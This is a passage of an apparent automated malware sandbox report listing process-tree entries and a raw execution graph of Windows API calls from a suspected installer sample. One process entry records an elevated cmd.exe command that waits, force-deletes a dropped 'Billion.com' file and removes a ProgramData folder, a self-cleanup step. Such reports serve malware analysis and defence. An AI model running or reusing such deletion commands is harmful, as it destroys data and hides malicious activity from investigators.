MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:35
Start time:13:28:24
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
Imagebase:0x7ff6f2da0000
File size:1'255'976 bytes
MD5 hash:F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:13:28:24
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
Imagebase:0x7ff6f2da0000
File size:1'255'976 bytes
MD5 hash:F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                                                                                        Start time:13:28:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exit
                                                                                                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                                                                                        Start time:13:28:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                                                                                        Start time:13:28:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                                                                                                                                                                        File size:25'088 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:17.7%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                          Signature Coverage:21%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:1482
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:26
RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 
4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 
4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 
3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3808 401a1f 3809 40145c 18 API calls 3808->3809 3810 401a26 3809->3810 3811 4062cf 11 API calls 3810->3811 3812 401a49 3811->3812 3813 401a64 3812->3813 3814 401a5c 3812->3814 3883 406035 lstrcpynW 3813->3883 3882 406035 lstrcpynW 3814->3882 3817 401a6f 3884 40674e lstrlenW CharPrevW 3817->3884 3818 401a62 3821 406064 5 API calls 3818->3821 3852 401a81 3821->3852 3822 406301 2 API calls 3822->3852 3825 401a98 CompareFileTime 3825->3852 3826 401ba9 3827 404f9e 25 API calls 3826->3827 3829 401bb3 3827->3829 3828 401b5d 3830 404f9e 25 API calls 3828->3830 3861 40337f 3829->3861 3832 401b70 3830->3832 3836 4062cf 11 API calls 3832->3836 3834 406035 lstrcpynW 3834->3852 3835 4062cf 11 API calls 3837 401bda 3835->3837 3841 401b8b 3836->3841 3838 401be9 SetFileTime 3837->3838 3839 401bf8 CloseHandle 3837->3839 3838->3839 3839->3841 3842 401c09 3839->3842 3840 406831 18 API calls 3840->3852 3843 401c21 3842->3843 3844 401c0e 3842->3844 3845 406831 18 API calls 3843->3845 3846 406831 18 API calls 
3844->3846 3847 401c29 3845->3847 3849 401c16 lstrcatW 3846->3849 3850 4062cf 11 API calls 3847->3850 3849->3847 3853 401c34 3850->3853 3851 401b50 3855 401b93 3851->3855 3856 401b53 3851->3856 3852->3822 3852->3825 3852->3826 3852->3828 3852->3834 3852->3840 3852->3851 3854 4062cf 11 API calls 3852->3854 3860 405e7c GetFileAttributesW CreateFileW 3852->3860 3887 405e5c GetFileAttributesW 3852->3887 3890 405ccc 3852->3890 3857 405ccc MessageBoxIndirectW 3853->3857 3854->3852 3858 4062cf 11 API calls 3855->3858 3859 4062cf 11 API calls 3856->3859 3857->3841 3858->3841 3859->3828 3860->3852 3862 40339a 3861->3862 3863 4033c7 3862->3863 3896 403368 SetFilePointer 3862->3896 3894 403336 ReadFile 3863->3894 3867 401bc6 3867->3835 3868 403546 3870 40354a 3868->3870 3871 40356e 3868->3871 3869 4033eb GetTickCount 3869->3867 3874 403438 3869->3874 3872 403336 ReadFile 3870->3872 3871->3867 3875 403336 ReadFile 3871->3875 3876 40358d WriteFile 3871->3876 3872->3867 3873 403336 ReadFile 3873->3874 3874->3867 3874->3873 3878 40348a GetTickCount 3874->3878 3879 4034af MulDiv wsprintfW 3874->3879 3881 4034f3 WriteFile 3874->3881 3875->3871 3876->3867 3877 4035a1 3876->3877 3877->3867 3877->3871 3878->3874 3880 404f9e 25 API calls 3879->3880 3880->3874 3881->3867 3881->3874 3882->3818 3883->3817 3885 401a75 lstrcatW 3884->3885 3886 40676b lstrcatW 3884->3886 3885->3818 3886->3885 3888 405e79 3887->3888 3889 405e6b SetFileAttributesW 3887->3889 3888->3852 3889->3888 3891 405ce1 3890->3891 3892 405d2f 3891->3892 3893 405cf7 MessageBoxIndirectW 3891->3893 3892->3852 3893->3892 3895 403357 3894->3895 3895->3867 3895->3868 3895->3869 3896->3863 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 
API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 
3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 
403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 
3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 
404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 
API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3897 4038af #17 SetErrorMode OleInitialize 3898 
